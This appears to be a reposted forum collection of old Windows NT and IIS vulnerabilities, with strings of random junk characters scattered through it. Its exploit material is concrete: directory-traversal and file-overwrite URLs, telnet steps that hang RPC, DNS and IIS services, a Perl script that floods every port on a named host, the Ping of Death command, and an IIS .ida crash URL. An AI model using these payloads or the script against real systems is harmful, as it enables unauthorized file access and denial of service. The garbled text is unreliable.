NT的漏洞及描述(英文）

受影响系统:4.0,iis 1.0
A URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.

, y1 E! l: Q+ L/ B& E  jA URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.
. W0 {7 A* K% `' l
5 A9 a* c7 |( _  ~- [By default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.
6 N3 t5 h6 j6 ?. c' r" |0 x
& Z' D/ A5 K, m: w" K7 |* ^--------------------------------------------------------------------
( j) l4 u6 u) r5 Q$ G
受影响系统:4.0
A URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat''.
2 d9 B$ F, R) S7 I
If the file 'target.bat' exists, the file will be truncated.
; f8 }  ~# ^7 _# Y

A URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat''.
3 ~$ y" \# ^: l8 {4 j; s
; p3 s3 j& C8 N/ B/ _  G----------------------------------------------------------------------

5 n& i2 p+ V7 A受影响系统:3.51,4.0
. N7 n5 B' I! ^Multiple service ports (53, 135, 1031) are vunerable to 'confusion'.
4 @( p2 U+ c3 Q! ^
) i' k- T3 X" m& |0 M" L: qThe following steps;

5 S; `% i7 D, {6 M9 TTelnet to an NT 4.0 system on port 135
Type about 10 characters followed by a <CR>
Exit Telnet
) A' m$ S" h$ ~+ f$ l; h5 C# Fresults in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.

When launched against port 135, NT Task manager on the target host shows RPCSS.EXE using more than usual process time. To clear this the system must be rebooted.
. X0 N5 E. p( m
The above also works on port 1031 (inetinfo.exe) where IIS services must be restarted.
/ v$ n* |- c% N  U3 H5 b
If a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.
3 T3 ^( U- @& |. S- x
0 x  C' V; @/ _The following is modified perl script gleaned from postings in the NTsecurity@iss.net list to test ports on your system (Perl is available from the NT resource kit):

9 }* j2 t( m/ `7 o4 I6 o/*begin poke code*/
/ R$ B6 }' J0 J+ ~0 g0 C$ J
use Socket;
use FileHandle;
require "chat2.pl";

0 h' ?2 G7 j: D$systemname = $ARGV[0] && shift;
2 C0 V9 M( L" W) s( y
: D0 z0 Z# J2 T! T9 W! I4 K. [9 Z; c$verbose = 1; # tell me what you're hitting
5 K% c/ K0 P" z! W8 @& v, t$ y; \$knownports = 1; # don't hit known problem ports
' X8 @- n3 h; M$ rfor ($port = $0; $port<65535; $port++)
3 C4 k; m7 Q: S+ D{

7 x+ B! X& T* c1 I  u
if ($knownports && ($port == 53 || $port == 135 || $port== 1031)) {
0 r  R" j( j2 i9 G$ p2 Enext;
9 X. ^9 f3 P" J}
$fh = chat::open_port($systemname, $port);
chat::print ($fh,"This is about ten characters or more");
if ($verbose) {
print "Trying port: $port\n";
1 I3 }: X6 ]  q}
( q# ~1 ]3 Y) q- L' D0 }chat::close($fh);

}
  j; D! a# c  A/ H* }0 n$ A) V% \
6 X3 A. ^. s, D9 _7 z* B+ M
/*end poke code*/
  `$ j  s- V  p! W
( _/ Z: ^1 I0 A1 QSave the above text as c:\perl\bin\poke, run like this: C:\perl\bin> perl poke servername

--------------------------------------------------------------------------------

  E  w5 [( K- j" T1 A' _/ E7 _受影响系统:4.0
; H9 P% g- e7 J8 J2 h4 a" u; `Using a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr> will crash IIS.
" W, Z+ e' U6 Y, d% s2 G
This attack causes Dr. Watson to display an alert window and to log an error:

% @4 M" l. a2 ]* p. ]3 o: X! V"The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT"
, g/ N+ K# v8 X
% e' A2 T0 w2 z$ Q+ ?$ m1 w4 ]; z--------------------------------------------------------------------------------
0 ]/ K$ `+ B; V- S8 w$ [
受影响系统:3.51,4.0
Large packet pings (PING -l 65527 -s 1 hostname) otherwise known as 'Ping of Death' can cause a blue screen of death on 3.51 systems:

STOP: 0X0000001E
! N( {  g' Q. J) p; ^8 d9 r4 WKMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS
# {% [3 Y9 n0 f. {4 r/ M- |
" r1 I/ O8 @# s5 B+ H-OR-
& E6 B0 D& @$ l2 R
# s& K2 k' y+ qSTOP: 0x0000000A
& y) o" W; K: `% KIRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS

$ B' A# X! c/ V" w, m) b; \NT 4.0 is vunerable sending large packets, but does not crash on receiving large packets.
- W' B& {9 D$ b$ d
--------------------------------------------------------------------------------
7 K: m" s! f# ~$ R9 W3 Z! ~* j0 b
Microsoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have 2 kinds of results. One possible outcome is that the server responds with a message like "URL String too long"; "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a Denial of Service attack against the server). Vulnerable are all IIS versions (up to and including IIS 5.0). When a remote attacker issues a URL request with the malformed URL: http://www.example.com/...[25kb of '.']...ida The server will either crash (causing an effective DoS attack) or report its current directory location (revealing the directory structure).
( k& F3 n0 h, x& y% |# j! Q" _
--------------------------------------------------------
2 [: j+ p" J- t2 d- f. \
5 ]& B7 F8 [3 A0 aIIS, Microsoft's Internet Information Server, can be used to reveal the true path of the files (where they physically reside on the local hard drive), by requesting a non-existing file with an IDQ/IDA extension. By requesting a URL such as: http://www.microsoft.com/anything.ida Or: http://www.microsoft.com/anything.idq A remote user will get a response that looks like: 'The IDQ d:\http\anything.idq could not be found' Such a response allows him to gain further knowledge on how the web site is organized and the directory structure of the server